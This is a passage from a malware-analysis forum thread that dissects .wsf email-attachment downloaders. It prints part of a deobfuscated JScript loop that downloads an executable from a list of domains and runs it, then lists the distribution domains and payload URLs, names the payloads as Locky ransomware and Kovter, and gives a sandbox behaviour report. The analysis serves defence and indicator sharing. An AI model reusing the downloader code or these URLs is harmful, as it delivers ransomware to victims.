'<ll.leng'; a += 'th;i++'; a += ') { va'; a += 'r dn=0;'; a += ' try { x'; a += 'o.open("'; a += 'GET","htt'; a += 'p://"+ll[i'; a += ']+"/counte'; a += 'r/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&'; a += 'a="+ad+"&'; a += 'r="+i+n,'; a += ' false);'; a += ' xo.se'; a += 'nd();'; a += ' if(xo.st'; a += 'atus==200)'; a += ' { xa.'; a += 'open(); xa'; a += '.type='; a += '1; xa'; a += '.write('; a += 'xo.res'; a += 'ponse'; a += 'Body)'; a += '; if(x'; a += 'a.size>1'; a += '0000) { dn'; a += '=1; xa.s'; a += 'aveToFi'; a += 'le(fn+n'; a += '+".exe",2)'; a += '; try{'; a += 'ws.Run(fn+'; a += 'n+".exe",'; a += '1,0);'; a += '}catch(er'; a += '){}; }; '; a += 'xa.close('; a += '); };'; a += ' if(dn==1)'; a += '{ld=i'; a += ';break'; a += ';}; } c'; a += 'atch(er)'; a += '{}; }; }; '; a += '};'; _eval(a);"

=> at the end : eval(a)
=> builds a new string and runs it.

It is the same deobfuscated downloader that have been seen on previous post, so I will only show domains & URLs used:


Payloads :

a1.exe : Locky ransomware

a2.exe : Win32/Kovter.C

Thanks for the update! The method used on this malware reminds me of the movie INCEPTION. It went to another level or stage as it builds a new string and to hide itself.

Inception 2 : the movie (Malware vs DardiM) Malware conceals his true true hiding place while sending Penguin on a wild goose hunt. WIll Penguin be able to navigate thru the labyrinth of obfuscated codes to track down Malware, Coming December 2017 at a thread near you on MT!
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Thanks for the update! The method used on this malware reminds me of the movie INCEPTION. It went to another level or stage as it builds a new string and to hide itself.

Inception 2 : the movie (Malware vs DardiM) Malware conceals his true true hiding place while sending Penguin on a wild goose hunt. WIll Penguin be able to navigate thru the labyrinth of obfuscated codes to track down Malware, Coming December 2017 at a thread near you on MT!
LOoOL !!!

Maybe we are thinking I post analysis here, and in reality, it is not reality ...
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/13-01-2016-22.67512/
Thanks to @Der.Reisende

Undelivered-Package-00780518.doc.wsf

- Exactly the same first downloader than Item-Delivery-Details-00000629997.doc.wsf posted yesterday

Domains :

var x = new Array(
"nobilisassessoria.com.br",
"sergeytattoo.ru",
"lacrossetravel.com",
"ru.ifo.su",
"cecichurrascoemdomicilio.com.br"​
);​
URLs built :

http ://domain/counter/?a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&m=5751177&i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU​
- Second downloader : PAYLOADS

Domains :​

var ll = [
"eternitydevelop.heyshop.eu",
"ru.ifo.su",
"www . vrlpromoters.com",
"cecichurrascoemdomicilio.com.br",
"nobilisassessoria.com.br"​
];​


a1.exe :

http ://domain1/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=01

http :/domain2/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=11

http ://domain3/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=21

http ://domain4/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=31

http ://domain5/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=41
a2.exe :

http ://domain1/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-
hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=02

http ://domain2/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=12

http ://domain3/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=22

http ://domain4/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=32

http ://domain5/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=42​

Payloads :

a1.exe : BehavesLike.Win32.AdwareDoma.gc

=> locky ransomware with osiris extension

Example : 777D4678--3D4D--492B--88DECF1E--D60D40AFD100.osiris​



a2.exe : Analysis with VoodoShield => Cuckoo Sandbox

Code:
Executed a process and injected code into it, probably while unpacking
Injection: a2.exe(1588) -> regsvr32.exe(1200)
Detects VirtualBox through the presence of a library
Detects Sandboxie through the presence of a library
Detects SunBelt Sandbox through the presence of a library
Deletes its original binary from disk
A process attempted to delay the analysis task by a long amount of time.
Process: regsvr32.exe tried to sleep 200083 seconds, actually delayed analysis time by 0 seconds
Process: a2.exe tried to sleep 100044 seconds, actually delayed analysis time by 0 seconds
Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config
regkeyval: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\asnb\navionvfna
regkeyval: HKEY_CURRENT_USER\Software\asnb\lwkoqrnylw
regkeyval: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\asnb\lwkoqrnylw
regkeyval: HKEY_CURRENT_USER\Software\HQa6Wm1X\vHNXi09hms
regkeyval: HKEY_CURRENT_USER\Software\HQa6Wm1X\9VljwUBAbW
regkeyval: HKEY_CURRENT_USER\Software\asnb\navionvfna
Creates a registry key or value with NUL characters to avoid detection with regedit
keyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x00utghemc\xe4\xb9\xa5
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x00utghemc\xe4\xb9\xa5
data: "C:\Users\Administrator\AppData\Local\d40a\7fe4.bat"
Attempts to identify installed analysis tools by registry key
key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Wireshark.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Wireshark.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Fiddler.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Fiddler.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Fiddler2.exe
key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Fiddler2.exe
key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fiddler2
key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fiddler2
key: HKEY_CURRENT_USER\Software\Microsoft\Fiddler2
key: HKEY_LOCAL_MACHINE\Software\Microsoft\Fiddler2
key: HKEY_CURRENT_USER\SOFTWARE\Classes\SOFTWARE\IEInspectorSoft\HTTPAnalyzerAddon
key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SOFTWARE\IEInspectorSoft\HTTPAnalyzerAddon
key: HKEY_CURRENT_USER\SOFTWARE\Classes\IEHTTPAnalyzer.HTTPAnalyzerAddOn
key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHTTPAnalyzer.HTTPAnalyzerAddOn
key: HKEY_CURRENT_USER\Software\Classes\Charles.AMF.Document
key: HKEY_LOCAL_MACHINE\Software\Classes\Charles.AMF.Document
Attempts to identify installed AV products by installation directory
file: C:\ProgramData\Trend Micro
File has been identified by at least ten Antiviruses on VirusTotal as malicious
MicroWorld-eScan: Gen:Variant.Symmi.69386
McAfee: Artemis!B751A0FEE0D5
Malwarebytes: Trojan.Kovter
CrowdStrike: malicious_confidence_63% (W)
Arcabit: Trojan.Symmi.D10F0A
Symantec: Heur.AdvML.B
ESET-NOD32: a variant of Win32/GenKryptik.REJ
Avast: Win32:Malware-gen
BitDefender: Gen:Variant.Symmi.69386
Ad-Aware: Gen:Variant.Symmi.69386
Emsisoft: Gen:Variant.Symmi.69386 (B)
F-Secure: Gen:Variant.Symmi.69386
Invincea: virus.win32.jadtre.k
McAfee-GW-Edition: BehavesLike.Win32.MultiPlug.fc
GData: Gen:Variant.Symmi.69386
Tencent: Win32.Trojan.Inject.Auto
Checks the version of Bios, possibly for anti-virtualization
Checks the presence of disk drives in the registry, possibly for anti-virtualization
Detects VirtualBox through the presence of a file
file: C:\Users\Administrator\AppData\Local\Temp\VBoxHook.dll
file: C:\Windows\VBoxHook.dll
file: C:\Windows\System32\VBoxHook.dll
file: C:\Windows\System32\wbem\VBoxHook.dll
file: C:\Windows\system\VBoxHook.dll
file: C:\Windows\SysWOW64\VBoxHook.dll
file: C:\Windows\System32\WindowsPowerShell\v1.0\VBoxHook.dll
file: C:\Windows\System32\drivers\VBoxMouse.sys
Detects VirtualBox through the presence of a registry key
Detects VMware through the presence of a file
Detects VMware through the presence of a registry key
Detects Virtual PC through the presence of a file
Attempts to modify browser security settings
Generates some ICMP traffic
Collects information to fingerprint the system
Anomalous binary characteristics


See the below link for test results with AVs, on Malware Hub part :

https://malwaretips.com/threads/locky-kovter.67546
Thanks to @silversurfer
and all the AV Tester Members.​
 
Last edited:

Svoll

Level 13
Verified
Top Poster
Well-known
Nov 17, 2016
627
a1.exe :

http ://domain1/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=01

http :/domain2/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=11

http ://domain3/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=21

http ://domain4/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=31

http ://domain5/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=41
a2.exe :

http ://domain1/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-
hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=02

http ://domain2/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=12

http ://domain3/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=22

http ://domain4/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=32

http ://domain5/counter/?i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU&a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&r=42

This is what INCEPTION calls a dream within a dream within a dream!!!!

Are you awake Penguin or still dreaming up this stuff :p:p:p

Thanks for this information!

Domains :

var x = new Array(
"nobilisassessoria.com.br",
"sergeytattoo.ru",
"lacrossetravel.com",
"ru.ifo.su",
"cecichurrascoemdomicilio.com.br"
);

URLs built :

http ://domains/counter/?a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&m=5751177&i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU
- Second downloader : PAYLOADS

Domains :

var ll = [
"eternitydevelop.heyshop.eu",
"ru.ifo.su",
"www.vrlpromoters.com",
"cecichurrascoemdomicilio.com.br",
"nobilisassessoria.com.br"
];
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
This is what INCEPTION calls a dream within a dream within a dream!!!!

Are you awake Penguin or still dreaming up this stuff :p:p:p

Thanks for this information!

Domains :

var x = new Array(
"nobilisassessoria.com.br",
"sergeytattoo.ru",
"lacrossetravel.com",
"ru.ifo.su",
"cecichurrascoemdomicilio.com.br"
);

URLs built :

http ://domains/counter/?a=1Cy71oRE6j5HNXhyrTPRQ2eCGK3jXhkLV8&m=5751177&i=zfMYCBSseqDvZEniioh_-bnYB-5qxE_4-hJuKYwKfNGl2oP_QSNuLQ_uZIGbCgLTjZ_LHeiXcM0N2ibWbMNACTU
- Second downloader : PAYLOADS

Domains :

var ll = [
"eternitydevelop.heyshop.eu",
"ru.ifo.su",
"www.vrlpromoters.com",
"cecichurrascoemdomicilio.com.br",
"nobilisassessoria.com.br"
];
Lol ! You make me doubt now ! Are we reals ? is MT real ? :D:(
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top